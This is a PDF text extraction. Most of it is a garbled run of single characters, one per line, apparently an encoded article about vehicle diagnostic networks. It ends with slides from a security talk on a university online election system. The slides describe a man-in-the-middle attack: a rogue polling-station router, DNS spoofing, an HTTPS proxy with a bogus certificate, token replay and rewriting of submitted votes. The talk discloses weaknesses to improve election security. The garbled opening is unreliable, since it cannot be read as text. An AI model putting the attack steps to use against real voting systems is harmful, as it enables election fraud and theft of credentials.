5
2
6
8
.
7
.
6
6
,
9
E
-
0
/
,
G
.
5
8
-
.
9
0
<
.
9
,
4
2
.
.
;
3
5
<
/
.
8
-
-
?
,
-
7
0
/
<
2
5
.
6
>
5
-
?
-
?
.
:
.
1
.
9
,
2
9
.
C
3
2
,
-
5
0
8
6
A
Y
Z
[
Q
7
0
@
.
9
6
/
3
7
?
/
0
9
.
-
?
,
8
-
?
.
/
5
8
5
=
\
/
,
2
a
.
/
5
6
6
5
0
8
6
7
0
8
-
9
0
2
b
:
3
8
7
-
5
0
8
,
2
5
-
E
8
.
7
.
6
6
,
9
E
-
0
/
.
.
-
:
.
1
.
9
,
2
9
.
C
3
2
,
-
5
0
8
6
A
H
?
.
Y
Z
[
Q
6
<
.
7
5
J
7
,
-
5
0
8
5
6
<
9
5
/
,
9
5
2
E
7
0
8
7
.
9
8
.
1
>
5
-
?
-
?
.
7
0
/
/
3
8
5
7
,
-
5
0
8
6
,
/
0
8
C
0
8
=
4
0
,
9
1
1
.
@
5
7
.
6
,
8
1
4
.
-
>
.
.
8
0
8
=
4
0
,
9
1
,
8
1
0
M
=
4
0
,
9
1
1
.
@
5
7
.
6
A
Y
Z
[
Q
6
<
.
7
5
J
.
6
,
6
5
8
C
2
.
<
?
E
6
5
7
,
2
5
8
-
.
9
:
,
7
.
7
0
8
8
.
7
-
0
9
D
7
,
2
2
.
1
-
?
.
1
5
,
C
8
0
6
-
5
7
2
5
8
G
7
0
8
8
.
7
=
-
0
9
K
[
+
X
L
D
>
5
-
?
\
^
<
5
8
6
K
5
8
-
>
0
9
0
>
6
0
:
c
L
D
2
0
7
,
-
.
1
0
8
-
?
.
1
9
5
@
.
9
V6
6
5
1
.
0
:
,
@
.
?
5
7
2
.
A
Y
Z
[
Q
6
<
.
7
5
J
.
6
-
?
9
.
.
1
,
-
,
2
5
8
G
2
,
E
.
9
6
D
,
8
E
0
8
.
0
:
>
?
5
7
?
5
6
9
.
;
3
5
9
.
1
-
0
4
.
<
9
.
6
.
8
-
5
8
,
@
.
?
5
7
2
.
A
H
>
0
,
9
.
6
<
.
7
5
J
.
1
4
E
T
B
_
D
,
8
1
0
8
.
5
6
6
<
.
7
5
J
.
1
4
E
-
?
.
O
8
-
.
9
8
,
-
5
0
8
,
2
Y
9
C
,
8
5
U
,
-
5
0
8
:
0
9
T
-
,
8
1
,
9
1
5
U
,
-
5
0
8
K
O
T
Y
L
A
H
?
.
-
>
0
T
B
_
1
,
-
,
2
5
8
G
2
,
E
.
9
6
,
9
.
@
,
9
5
,
4
2
.
<
3
2
6
.
=
>
5
1
-
?
/
0
1
3
2
,
-
5
0
8
Kd
e
f
L
,
8
1
<
3
2
6
.
>
5
1
-
?
/
0
1
3
2
,
-
5
0
8
K
e
f
g
L
A
H
?
.
O
T
Y
1
,
-
,
2
5
8
G
2
,
E
.
9
5
6
C
.
8
.
9
,
2
2
E
7
,
2
2
.
1
a
O
T
Y
:
0
9
/
,
-
b
D
,
6
5
-
5
6
-
?
.
0
8
2
E
6
5
C
8
5
J
7
,
8
-
<
0
9
-
5
0
8
0
:
Y
Z
[
Q
-
0
4
.
6
<
.
7
5
J
.
1
4
E
O
T
Y
A
H
?
.
O
T
Y
:
0
9
/
,
-
1
,
-
,
2
5
8
G
2
,
E
.
9
5
6
7
0
8
@
.
8
5
.
8
-
2
E
6
5
/
5
2
,
9
-
0
h
T
=
Q
i
Q
D
,
8
1
/
,
8
E
?
0
4
4
E
5
6
-
6
?
,
@
.
-
,
G
.
8
,
1
@
,
8
-
,
C
.
0
:
-
?
,
-
<
9
0
<
.
9
-
E
A
Y
Z
[
Q
6
<
.
7
5
J
.
6
,
8
.
-
>
0
9
G
2
,
E
.
9
D
5
8
7
2
3
1
5
8
C
8
.
-
>
0
9
G
,
1
1
9
.
6
6
.
6
,
8
1
<
,
7
G
.
-
:
0
9
/
,
-
6
:
0
9
,
@
,
9
5
.
-
E
0
:
,
<
<
2
5
7
,
-
5
0
8
6
A
H
?
.
8
.
-
>
0
9
G
2
,
E
.
9
5
6
6
?
,
9
.
1
4
E
,
2
2
1
,
-
,
2
5
8
G
2
,
E
.
9
6
K
d
e
f
D
e
f
g
D
,
8
1
O
T
Y
L
A
B
2
2
0
:
Y
Z
[
Q
3
<
-
0
-
?
.
8
.
-
>
0
9
G
2
,
E
.
9
5
6
9
.
;
3
5
9
.
1
4
E
:
.
1
.
9
,
2
9
.
C
3
2
,
-
5
0
8
6
A
Y
Z
[
Q
,
2
6
0
9
.
:
.
9
.
8
7
.
6
-
?
.
7
0
8
-
9
0
2
2
.
9
,
9
.
,
8
.
-
>
0
9
G
K
X
B
I
L
D
6
<
.
7
5
J
.
1
4
E
Z
0
6
7
?
,
8
1
O
T
Y
D
:
0
9
0
-
?
.
9
@
.
?
5
7
2
.
<
3
9
<
0
6
.
6
A
H
?
.
X
B
I
<
?
E
6
5
7
,
2
2
,
E
.
9
5
6
7
0
8
6
5
1
.
9
,
4
2
E
:
,
6
-
.
9
-
?
,
8
-
?
.
-
?
9
.
.
Y
Z
[
Q
<
?
E
6
5
7
,
2
2
,
E
.
9
6
A
O
-
5
6
/
0
6
-
0
:
-
.
8
3
6
.
1
:
0
9
5
8
-
9
,
@
.
?
5
7
2
.
7
0
/
/
3
8
5
7
,
-
5
0
8
4
.
-
>
.
.
8
1
5
M
.
9
.
8
-
7
0
8
-
9
0
2
/
0
1
3
2
.
6
A
H
?
.
[
+
X
5
6
6
<
.
7
5
J
.
1
-
0
5
8
7
2
3
1
.
,
7
0
8
8
.
7
-
5
0
8
-
0
-
?
.
X
B
I
8
.
-
>
0
9
G
A
d
.
?
5
7
2
.
/
,
8
3
:
,
7
-
3
9
.
9
6
,
9
.
2
5
G
.
2
E
-
0
<
9
0
@
5
1
.
.
`
<
,
8
1
.
1
:
3
8
7
-
5
0
8
,
2
5
-
E
0
8
-
?
.
X
B
I
8
.
-
>
0
9
G
,
6
0
<
<
0
6
.
1
-
0
0
8
.
0
:
-
?
.
-
?
9
.
.
Y
Z
[
Q
8
.
-
>
0
9
G
6
A
H
?
.
Y
Z
[
Q
8
.
-
>
0
9
G
2
,
E
.
9
6
<
.
7
5
J
.
6
<
,
7
G
.
-
:
0
9
/
,
-
6
:
0
9
6
.
@
.
9
,
2
:
3
8
7
-
5
0
8
6
A
B
:
.
>
0
:
-
?
.
6
.
:
3
8
7
-
5
0
8
6
,
9
.
9
.
;
3
5
9
.
1
4
E
:
.
1
.
9
,
2
9
.
C
3
2
,
-
5
0
8
6
A
T
5
8
7
.
,
3
-
0
/
0
4
5
2
.
6
,
9
.
9
.
;
3
5
9
.
1
-
0
?
,
@
.
,
8
.
-
>
0
9
G
:
0
9
/
,
8
1
,
-
.
1
<
3
9
<
0
6
.
6
D
/
,
8
E
D
<
.
9
?
,
<
6
,
2
2
D
,
3
-
0
/
0
=
4
5
2
.
6
,
2
6
0
3
6
.
-
?
5
6
8
.
-
>
0
9
G
:
0
9
0
-
?
.
9
<
3
9
<
0
6
.
6
A
g
0
6
-
7
0
/
/
0
8
5
6
-
?
.
3
6
.
0
:
Y
Z
[
Q
:
0
9
,
1
1
5
-
5
0
8
,
2
1
5
,
C
8
0
6
-
5
7
<
3
9
<
0
6
.
6
4
.
E
0
8
1
.
/
5
6
6
5
0
8
7
0
8
-
9
0
2
A
B
2
6
0
7
0
/
/
0
8
5
6
-
?
.
3
6
.
0
:
-
?
.
8
.
-
>
0
9
G
:
0
9
3
<
2
0
,
1
5
8
C
0
9
1
0
>
8
2
0
,
1
5
8
C
,
9
4
5
-
9
,
9
E
4
2
0
7
G
6
0
:
/
.
/
0
9
E
:
9
0
/
0
8
=
4
0
,
9
1
1
.
@
5
7
.
6
A
H
?
,
-
/
.
/
0
9
E
7
,
8
7
0
8
-
,
5
8
<
,
9
,
/
.
-
.
9
6
:
0
9
9
3
8
8
5
8
C
-
?
.
@
.
?
5
7
2
.
D
6
-
0
9
.
1
1
,
-
,
:
9
0
/
0
8
=
4
0
,
9
1
6
.
8
6
0
9
6
D
0
9
.
@
.
8
.
`
.
7
3
-
,
4
2
.
7
0
1
.
:
0
9
0
8
=
4
0
,
9
1
/
5
7
9
0
<
9
0
7
.
6
6
0
9
6
A
H
?
.
/
0
6
-
7
0
/
/
0
8
3
6
.
0
:
Y
Z
[
Q
5
6
-
0
.
`
,
/
5
8
.
1
5
,
C
8
0
6
-
5
7
-
9
0
3
4
2
.
7
0
1
.
6
K
[
H
X
6
L
A
B
[
H
X
5
6
,
8
.
9
9
0
9
7
0
1
.
-
?
,
-
5
6
6
-
0
9
.
1
>
?
.
8
,
@
.
?
5
7
2
.
1
.
-
.
9
/
5
8
.
6
6
0
/
.
,
4
8
0
9
/
,
2
7
0
8
1
5
-
5
0
8
A
H
?
.
,
7
-
5
0
8
0
:
6
-
0
9
5
8
C
,
[
H
X
3
6
3
,
2
2
E
7
,
3
6
.
6
-
?
.
7
?
.
7
G
.
8
C
5
8
.
2
5
C
?
-
K
5
8
Y
Z
[
Q
-
.
9
/
6
D
-
?
.
/
,
2
:
3
8
7
-
5
0
8
5
8
1
5
7
,
-
0
9
2
,
/
<
D
g
O
+
L
-
0
5
2
2
3
/
5
8
,
-
.
A
+
.
6
6
7
9
5
-
5
7
,
2
.
9
9
0
9
6
7
,
8
7
,
3
6
.
,
[
H
X
-
0
4
.
6
-
0
9
.
1
>
5
-
?
0
3
-
-
9
5
C
C
.
9
5
8
C
-
?
.
g
O
+
A
B
/
.
7
?
,
8
5
7
D
3
6
5
8
C
,
1
.
@
5
7
.
7
,
2
2
.
1
,
6
7
,
8
-
0
0
2
D
7
,
8
9
.
,
1
-
?
.
[
H
X
6
:
9
0
/
-
?
.
@
.
?
5
7
2
.
D
1
.
7
0
1
.
-
?
.
[
H
X
/
.
,
8
5
8
C
D
,
8
1
3
6
.
-
?
,
-
5
8
:
0
9
/
,
-
5
0
8
-
0
J
`
-
?
.
@
.
?
5
7
2
.
A
H
?
.
6
7
,
8
-
0
0
2
,
2
6
0
,
2
2
0
>
6
,
3
6
.
9
-
0
7
2
.
,
9
-
?
.
6
-
0
9
.
1
[
H
X
6
D
>
?
5
7
?
>
5
2
2
7
,
3
6
.
-
?
.
g
O
+
D
5
:
5
2
2
3
/
5
8
,
-
.
1
D
-
0
6
?
3
-
0
M
A
Y
4
@
5
0
3
6
2
E
D
5
:
-
?
.
<
9
0
4
2
.
/
>
5
-
?
-
?
.
@
.
?
5
7
2
.
5
6
8
0
-
J
`
.
1
D
-
?
.
[
H
X
>
5
2
2
4
.
-
9
5
C
C
.
9
.
1
,
C
,
5
8
A
[
.
<
.
8
1
5
8
C
0
8
-
?
.
[
H
X
-
?
,
-
>
,
6
-
9
5
C
C
.
9
.
1
D
:
9
.
.
U
.
:
9
,
/
.
1
,
-
,
7
,
8
,
2
6
0
4
.
6
-
0
9
.
1
A
j
9
.
.
U
.
:
9
,
/
.
1
,
-
,
7
0
8
-
,
5
8
6
@
,
2
3
.
6
:
9
0
/
9
.
2
.
@
,
8
-
@
.
?
5
7
2
.
6
.
8
6
0
9
6
,
-
-
?
.
-
5
/
.
-
?
.
[
H
X
>
,
6
6
-
0
9
.
1
A
B
8
0
-
?
.
9
7
0
/
/
0
8
3
6
.
0
:
Y
Z
[
Q
5
6
-
0
<
9
0
@
5
1
.
,
1
1
5
-
5
0
8
,
2
1
5
,
C
8
0
6
-
5
7
5
8
:
0
9
/
,
-
5
0
8
A
[
,
-
,
:
9
0
/
@
.
?
5
7
2
.
6
.
8
6
0
9
6
7
,
8
4
.
;
3
.
9
5
.
1
7
0
8
-
5
8
3
0
3
6
2
E
,
8
1
9
.
<
0
9
-
.
1
A
d
.
?
5
7
2
.
Q
6
3
4
6
E
6
-
.
/
6
7
,
8
4
.
9
.
;
3
.
6
-
.
1
-
0
<
.
9
:
0
9
/
,
6
.
2
:
-
.
6
-
<
9
0
7
.
1
3
9
.
,
8
1
9
.
<
0
9
-
-
?
.
9
.
6
3
2
-
6
A
Z
.
E
0
8
1
-
?
.
1
5
,
C
8
0
6
-
5
7
7
,
<
,
4
5
2
5
-
5
.
6
0
:
Y
Z
[
Q
D
/
,
8
E
7
0
8
J
C
3
9
,
-
5
0
8
-
,
6
G
6
7
,
8
4
.
1
0
8
.
0
@
.
9
-
?
.
8
.
-
>
0
9
G
A
B
8
-
5
=
-
?
.
:
-
6
E
6
-
.
/
6
-
?
,
-
9
.
;
3
5
9
.
,
G
.
E
K
<
?
E
6
5
7
,
2
0
9
.
2
.
7
-
9
0
8
5
7
L
7
,
8
4
.
<
9
0
C
9
,
/
/
.
1
0
@
.
9
Y
Z
[
Q
A
B
1
@
,
8
7
.
1
@
.
?
5
7
2
.
6
3
4
6
E
6
-
.
/
6
D
6
3
7
?
,
6
.
2
.
7
-
9
0
8
5
7
-
9
,
7
-
5
0
8
7
0
8
-
9
0
2
0
9
-
3
8
,
4
2
.
,
5
9
6
3
6
<
.
8
6
5
0
8
6
D
7
,
8
4
.
7
,
2
5
4
9
,
-
.
1
0
@
.
9
Y
Z
[
Q
A
_
2
.
7
-
9
0
8
5
7
:
3
.
2
5
8
F
.
7
-
5
0
8
>
,
6
0
8
.
.
,
9
2
E
3
6
.
0
:
.
2
.
7
-
9
0
8
5
7
7
0
8
-
9
0
2
D
,
8
1
,
6
3
4
6
-
,
8
-
5
,
2
,
:
-
.
9
/
,
9
G
.
-
.
`
5
6
-
6
:
0
9
9
.
<
9
0
C
9
,
/
/
5
8
C
-
?
.
.
8
C
5
8
.
/
,
8
,
C
.
/
.
8
-
7
0
/
=
<
3
-
.
9
D
-
E
<
5
7
,
2
2
E
-
0
,
7
?
5
.
@
.
?
5
C
?
.
9
0
3
-
<
3
-
<
0
>
.
9
A
H
?
.
,
:
-
.
9
/
,
9
G
.
-
<
9
0
1
3
7
-
-
,
G
.
6
-
?
.
:
0
9
/
0
:
,
1
.
@
5
7
.
-
0
7
0
8
8
.
7
-
@
5
,
-
?
.
[
H
X
-
?
,
-
<
9
0
C
9
,
/
6
-
?
.
.
8
C
5
8
.
/
,
8
=
,
C
.
/
.
8
-
7
0
/
<
3
-
.
9
D
0
9
,
9
.
<
2
,
7
.
/
.
8
-
/
.
/
0
9
E
7
?
5
<
-
?
,
-
1
5
9
.
7
-
2
E
9
.
<
2
,
7
.
6
-
?
.
7
?
5
<
5
8
-
?
.
.
8
C
5
8
.
A
T
0
/
.
-
5
/
.
6
-
?
.
,
:
-
.
9
/
,
9
G
.
-
<
9
0
C
9
,
/
/
5
8
C
1
.
@
5
7
.
>
5
2
2
7
0
8
=
J
C
3
9
.
0
-
?
.
9
<
,
9
,
/
.
-
.
9
6
D
6
3
7
?
,
6
7
,
2
5
4
9
,
-
5
8
C
-
?
.
6
<
.
.
1
0
/
.
-
.
9
,
8
1
0
1
0
/
.
-
.
9
:
0
9
1
5
M
.
9
.
8
-
6
5
U
.
1
-
5
9
.
6
A
B
8
0
-
?
.
9
3
6
.
0
:
Y
Z
[
Q
D
>
?
5
7
?
5
6
8
0
-
6
<
.
7
5
J
.
1
4
E
T
B
_
D
,
8
1
?
,
6
4
.
.
8
G
.
.
<
:
,
5
9
2
E
;
3
5
.
-
4
E
-
?
.
,
3
-
0
/
0
-
5
@
.
/
,
8
3
:
,
7
-
3
9
.
9
6
D
5
6
-
?
.
7
9
,
6
?
1
,
-
,
9
.
7
0
9
1
.
9
K
X
[
h
L
A
H
?
.
X
[
h
5
6
<
,
9
-
0
:
-
?
.
,
5
9
4
,
C
6
.
8
6
0
9
,
8
1
1
.
<
2
0
E
/
.
8
-
6
E
6
-
.
/
A
H
?
.
X
[
h
6
-
0
9
.
6
5
8
:
0
9
/
,
-
5
0
8
9
.
2
,
-
5
8
C
-
0
>
?
,
-
5
6
7
,
2
2
.
1
,
a
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
b
D
,
7
0
8
1
5
-
5
0
8
-
?
,
-
7
,
3
6
.
6
-
?
.
,
5
9
4
,
C
-
0
5
8
k
,
-
.
D
0
9
1
.
<
2
0
E
A
H
?
.
X
[
h
/
,
E
6
-
0
9
.
5
8
:
0
9
/
,
-
5
0
8
,
4
0
3
-
,
8
0
8
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
,
8
1
,
9
.
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
A
B
8
0
8
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
5
6
4
,
6
5
7
,
2
2
E
,
8
.
,
9
/
5
6
6
-
?
,
-
-
?
.
X
[
h
1
.
-
.
9
/
5
8
.
1
-
0
4
.
6
5
C
8
5
J
7
,
8
-
A
B
9
.
=
1
.
<
2
0
E
/
.
8
-
.
@
.
8
-
5
6
,
8
.
@
.
8
-
,
:
-
.
9
-
?
.
,
5
9
4
,
C
1
.
<
2
0
E
.
1
D
,
8
1
5
6
,
4
5
-
0
:
,
/
5
6
8
0
/
.
9
6
5
8
7
.
7
3
9
9
.
8
-
C
.
8
.
9
,
-
5
0
8
,
5
9
4
,
C
7
,
8
8
0
-
1
.
<
2
0
E
/
0
9
.
-
?
,
8
0
8
7
.
A
H
?
.
5
8
:
0
9
/
,
-
5
0
8
6
-
0
9
.
1
7
,
8
5
8
7
2
3
1
.
6
<
.
.
1
0
:
-
?
.
@
.
?
5
7
2
.
D
6
-
,
-
.
0
:
-
?
.
4
9
,
G
.
,
8
1
-
?
9
0
-
-
2
.
D
,
8
1
6
-
,
-
3
6
0
:
-
?
.
1
9
5
@
.
9
V6
6
.
,
-
4
.
2
-
A
H
?
.
9
.
?
,
6
4
.
.
8
6
0
/
.
6
<
.
7
3
2
,
-
5
0
8
,
4
0
3
-
-
?
.
8
.
`
-
C
.
8
.
9
,
-
5
0
8
0
:
Y
Z
[
D
6
0
7
,
2
2
.
1
Y
Z
[
i
A
H
?
.
C
0
@
.
9
8
/
.
8
-
5
6
2
5
G
.
2
E
-
0
/
,
8
1
,
-
.
/
0
9
.
6
3
4
6
-
,
8
-
5
,
2
.
/
5
6
6
5
0
8
6
7
0
8
-
9
0
2
1
.
@
5
7
.
6
,
8
1
<
9
0
7
.
1
3
9
.
6
A
B
X
[
h
5
6
8
0
-
7
3
9
9
.
8
-
2
E
9
.
;
3
5
9
.
1
4
E
2
,
>
D
4
3
-
/
,
E
4
.
5
8
-
?
.
:
3
-
3
9
.
A
O
8
-
?
.
8
,
/
.
0
:
7
0
8
@
.
8
5
.
8
7
.
-
0
-
?
.
@
.
?
5
7
2
.
0
>
8
.
9
D
-
?
.
C
0
@
.
9
8
/
.
8
-
/
,
E
/
,
8
1
,
-
.
,
6
E
6
-
.
/
-
?
,
-
7
0
8
-
5
8
3
,
2
2
E
9
.
<
0
9
-
6
@
.
?
5
7
2
.
0
<
.
9
,
-
5
8
C
6
-
,
-
3
6
5
8
2
5
.
3
0
:
E
.
,
9
2
E
5
8
6
<
.
7
-
5
0
8
6
A
d
.
9
E
2
5
-
-
2
.
5
6
G
8
0
>
8
7
0
8
7
9
.
-
.
2
E
,
4
0
3
-
Y
Z
[
i
D
4
3
-
:
0
9
-
?
0
6
.
>
?
0
1
0
8
0
-
-
9
3
6
-
-
?
,
-
-
?
.
C
0
@
.
9
8
/
.
8
-
>
5
2
2
,
2
>
,
E
6
/
,
8
1
,
-
.
>
?
,
-
5
6
4
.
6
-
:
0
9
5
-
6
7
5
-
5
U
.
8
6
D
5
-
>
0
3
2
1
4
.
>
5
6
.
-
0
4
.
,
>
,
9
.
,
8
1
5
8
@
0
2
@
.
1
4
.
:
0
9
.
3
8
,
7
7
.
<
-
,
4
2
.
2
,
>
6
C
.
-
<
,
6
6
.
1
D
9
,
-
?
.
9
-
?
,
8
,
:
-
.
9
A
H
?
.
5
8
:
0
9
/
,
-
5
0
8
,
8
1
:
3
8
7
-
5
0
8
,
2
5
-
E
,
@
,
5
2
,
4
2
.
0
8
,
/
0
1
.
9
8
,
3
-
0
/
0
4
5
2
.
@
5
,
.
2
.
7
-
9
0
8
5
7
8
.
-
>
0
9
G
6
5
6
7
0
8
6
5
1
.
9
,
4
2
.
A
H
?
0
3
C
?
-
?
.
9
.
,
9
.
6
0
/
.
6
-
,
8
1
,
9
1
6
5
8
<
2
,
7
.
:
0
9
-
?
.
6
.
8
.
-
>
0
9
G
6
D
/
,
8
E
7
9
5
-
5
7
,
2
<
5
.
7
.
6
,
9
.
8
0
-
6
-
,
8
1
,
9
1
5
U
.
1
A
H
?
.
/
,
F
0
9
5
-
E
0
:
@
.
?
5
7
2
.
0
>
8
.
9
6
,
9
.
.
M
.
7
-
5
@
.
2
E
<
9
.
@
.
8
-
.
1
:
9
0
/
,
7
7
.
6
6
5
8
C
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
0
8
-
?
.
5
9
0
>
8
@
.
?
5
7
2
.
6
1
3
.
-
0
-
?
.
.
`
0
9
4
5
-
,
8
-
7
0
6
-
6
0
:
7
0
/
<
,
-
5
4
2
.
.
;
3
5
<
/
.
8
-
,
8
1
-
?
.
3
8
=
>
5
2
2
5
8
C
8
.
6
6
0
:
/
,
8
3
:
,
7
-
3
9
.
9
6
-
0
<
9
0
@
5
1
.
6
<
.
7
5
J
7
,
-
5
0
8
6
0
8
9
.
,
6
0
8
,
4
2
.
-
.
9
/
6
A
H
?
.
5
8
,
7
7
.
6
6
5
4
5
2
5
-
E
0
:
-
?
5
6
5
8
:
0
9
/
,
-
5
0
8
<
9
.
@
.
8
-
6
7
,
6
3
,
2
/
.
7
?
,
8
5
7
6
:
9
0
/
.
,
6
5
2
E
>
0
9
G
=
5
8
C
0
8
-
?
.
5
9
@
.
?
5
7
2
.
6
D
,
6
>
.
2
2
,
6
<
9
.
@
.
8
-
5
8
C
7
0
8
7
.
9
8
.
1
7
5
-
5
U
.
8
6
:
9
0
/
1
.
-
.
9
/
5
8
5
8
C
.
`
,
7
-
2
E
>
?
,
-
5
8
:
0
9
/
,
-
5
0
8
-
?
.
5
9
@
.
?
5
7
2
.
5
6
6
-
0
9
5
8
C
,
4
0
3
-
-
?
.
/
A
H
?
.
9
.
5
6
,
2
0
-
-
0
-
.
7
?
8
5
7
,
2
2
E
,
8
1
6
0
7
5
0
<
0
2
5
-
5
7
,
2
2
E
.
`
<
2
0
9
.
-
0
4
.
,
4
2
.
-
0
<
0
<
0
<
.
8
-
?
.
.
2
.
7
-
9
0
8
5
7
5
8
:
0
9
/
,
-
5
0
8
5
8
,
@
.
?
5
7
2
.
,
6
.
,
6
5
2
E
,
6
0
8
.
7
,
8
<
0
<
-
?
.
?
0
0
1
A
i
l
m
n
o
p
q
n
r
q
s
t
u
v
w
x
y
z
{
|
}
~
}
y
|
|
~
}
y
z
}
y
}
~
}
y
}
z
A
T
0
7
5
.
-
E
0
:
B
3
-
0
/
0
-
5
@
.
_
8
C
5
8
.
.
9
6
D
O
8
7
A
?
-
-
<
>
>
>
A6
,
.
A
0
9
C
| pdf |
Increasing the security of
your election by fixing it
Daniel C. Silverstein
Damon McCormick
[email protected]
[email protected]
Part One:
Disaster Strikes
The 2000 US Presidential Election led
many to question the accuracy of paper
ballot systems
Several companies seized
on this opportunity to
promote electronic
voting systems:
• Election Systems & Software
• Diebold Election Systems
• Hart InterCivic
• Sequoia Voting Systems
• “...three independent but redundant
memory paths ensure that no votes will
ever be lost or altered.” [1]
• “...World-class encryption techniques
utilized to store election results.” [2]
• “Proprietary firmware on closed system
prevents hacker access.” [3]
Lofty Promises Made
• Trust Us!
• We know what we’re doing!
• Of course we don't have bugs!
• Don't have security holes either!
• And, even if we did, (which we don’t) nobody
could ever actually exploit them
The Message?
And so, Democracy was made safe from evil hackers
The End
If it looks like snake oil...
And it smells like snake oil...
And it tastes like snake oil...
It’s probably snake oil [4]
Or Not
Q: What’s the first thing you do after rooting a box?
Q: What’s the second thing you do after rooting a box?
Pop Quiz 1
A: Hide your presence
A: Patch the hole you came in through
(so nobody else can use it)
Q: How do you tell that someone rooted your box?
Pop Quiz 2
A: Good question!
Forensics analysis is hard!
You can't trust information from a compromised machine.
Q: How do you tell that someone tampered with the
electronic voting machine you just used to vote?
A: You don’t
Pop Quiz 3
• The major commercial electronic voting
machines do not produce a voter verifiable
paper trail
• Though, thanks in part to the work of David Dill [5],
some of the vendors are testing prototypes that do
• Without a paper trail, thre is no way to
detect tampering
No Paper Trail
• The major commercial electronic voting
systems are proprietary platforms, protected
as trade secrets
• Members of the security community at large
cannot scrutinize the machines without signing
prohibitive Non-Disclosure Agreements
• We must trust the vendors to detect machine
tampering or malfunction
• In practice, security through obscurity doesn't help
• Just look at Microsoft's security record
Setec Astronomy
• There is little public data on how electronic
voting systems behave in a real election setting
• Not possible to verify the tally in a secret ballot
• Performing a realistic test would be difficult
• Require thousands of volunteers
• Expensive
• Easy to cheat
• Independent third parties can't verify operation
of systems without signing an NDA
• No way to publish results!
Too Little Data
• Electronic voting systems
may be worse than paper
systems!
• There are numerous
avenues of attack on
computer ballot systems
that simply have no
analogue in a paper ballot
system
The Big Problem
• Electronic voting raises
unique security issues
• Failure to understand
these issues could leave
US State and Federal
elections open to
unprecedented fraud!
The Big Problem
“If paramilitary rebels were to take over a voting kiosk
and force computer scientists to work day and night,
they would still not be able to lodge a single false ballot
or affect the outcome.”
--Tommaso Sciortino, ASUC Elections Chair [6]
Part Two:
The Associated Students of the
University of California (ASUC)
Online Election System (OES)
• OES represents a unique opportunity to analyze
the security of an electronic voting system
• Though not fully open, the source to OES was
available on request and without an NDA
• Over 30,000 students were eligible to vote in the
election
• Approximately 9,000 votes were cast
• We reviewed OES in April 2003; this was its first run.
Online Election System
• Ballot Server
• Authentication Layer
(CalNet, CalNetAWS)
• Polling Stations
OES Architecture
• The Ballot Server hosts a simple web application
students access via a web browser at one of the
polling stations
• The voting application works as follows:
• If necessary, redirect user to CalNet for authentication
• Perform sanity checks (has user already voted?)
• Record users vote
• The Ballot Server ran Red Hat 8
• OES was implemented with Macromedia
ColdFusionMX on Apache 2.0, using MySQL as a
backend database.
Ballot Server
• CalNet [7] is UC Berkeley’s central Kerberos
authentication system
• Implemented via Microsoft Active Directory
• Polling station clients authenticate via
Kerberos web proxy
• Upon successful authentication, a signed
authentication token is passed to the clients
web browser
Authentication Layer (CalNet)
Polling Stations
• Polling stations consist of
three to ten Apple
iBooks behind an
inexpensive home
router/gateway
performing DHCP and
NAT
• Entire polling station sits
behind one IP address
• Traffic that polling station clients exchange
with CalNet and the Ballot Server is sent via
https
• In principle, this should make it impossible to
read or alter traffic
• The security of the election hinges on the
security of the CalNet system
OES Security Assumptions
• Physical security emphasized
• Election officials seemed to have serious concerns
that someone would try to break into the server
room and steal the server
• Basic network security aspects ignored
• The database listened for requests from external
hosts
• Access was not restricted exclusively to web traffic
originating from one of the known polling stations
Ballot Server Defense
• It is trivial to tamper with a machine with
physical access
• Election officials implemented strong physical
security measures
• Physical security doesn’t protect against social
engineering
• As initially configured, the open database
port was the most obvious point of attack
Ballot Server Attacks
• Adding a firewall raised the bar considerably
• Only traffic from the polling stations on ports
80 and 443 was allowed through
• An attack would require preparing an exploit in
advance, storing it on removable media, and
running it from a polling station client
Ballot Server Attacks
• CalNet is not written or managed by the
OES developers
• CalNet authentication tokens are
timestamped, and have a limited lifetime
CalNet Defense
• Compromising any of the CalNet machines would
be a bad idea
• Capturing authentication tokens does not require
compromising CalNet’s servers
• Regardless of the short lifetime, tokens can be replayed
CalNet Attacks
• The election staff originally planned to use
computers rented from students for the
polling stations
• We suggested that election officials create
an unprivileged account on the iBooks that
only had permissions to run a web browser
• Default passwords on the router/gateway
boxes were changed
Polling Station Defense
• Had election officials actually used rented
student computers, one could give them a
trojaned machine
• Even with machines that are reasonably well
locked down, it is virtually impossible to
protect a machine from tampering if the
user has physical access
• Polling stations were monitered, but voters were
supposed to have private voting booths.
Polling Station Attacks
• The key idea here is the need for trusted endpoints
• Proving the trustworthiness of a machine is incredibly
difficult.
• Conventional hardware is not designed to be tamper
resistant
• Tampering with individual clients would be time
consuming.
• 70+ machines spread across 15 polling stations.
• Is it possible to compromise an entire polling station
in one fell swoop?
Polling Station Attacks
Part Three:
Man-in-the-Middle
Attack on OES
• We want to acquire CalNet tokens so that
we can replay them to the Ballot Server to
cast fraudulent votes
• It is not possible to sniff the tokens because
clients access CalNet and Ballot Server over
https
• But we can trick the client into giving us a
valid token by making it believe that our
man-in-the-middle is the Ballot Server
Summary
The Attack
• We will construct a man-in-the-middle box,
which we refer to as fakeballot
• Fakeballot is a drop-in replacement for the
router/gateways that perform NAT at each
polling station
• For this attack, we will need:
1 x86 PC
2 network interfaces
1 GNU/Linux distro (Debian)
1 DNS server (djbdns)
1 DHCP server (ISC DHCP)
1 web server with ssl support (apache + mod_ssl)
1 SSL certificate featuring the FQDN of the Ballot Server
signed with a bogus CA (Verisign Inc.) [8]
Ingredients
• Configuring linux to perform simple NAT is
an iptables one-liner
• The external IP of fakeballot will be the IP of the
polling station we will compromise
• The internal IP of fakeballot will be 192.168.1.1
• fakeballot runs a DHCP daemon that
returns its own IP as the only nameserver
NAT and DHCP
• DNS behaves normally for all hostnames,
except that of the Ballot Server
• DNS returns the internal IP of fakeballot
whenever a request is made for the Ballot
Server’s hostname
DNS Spoofing
• Apache listens on fakeballot’s internal IP
• We wrote a small perl script to proxy traffic
to and from Ballot Server
• We simply make standard https requests from
Ballot Server, and pass the returned data directly
to the client
• We have the user’s authentication token
• It is sent via http post in most Ballot Server requests
• When the voting forms are submitted, we
dynamically change the user’s votes.
Configuring Apache
• fakeballot’s SSL certificate is signed by a
bogus certificate authority
• This leads to ugly warning messages
What about SSL?
• Count on user behavior
• Browser warnings not that scary, typical users just ‘Click Ok’
• Only one user needs to accept the certificate
• Attacker can add certificate
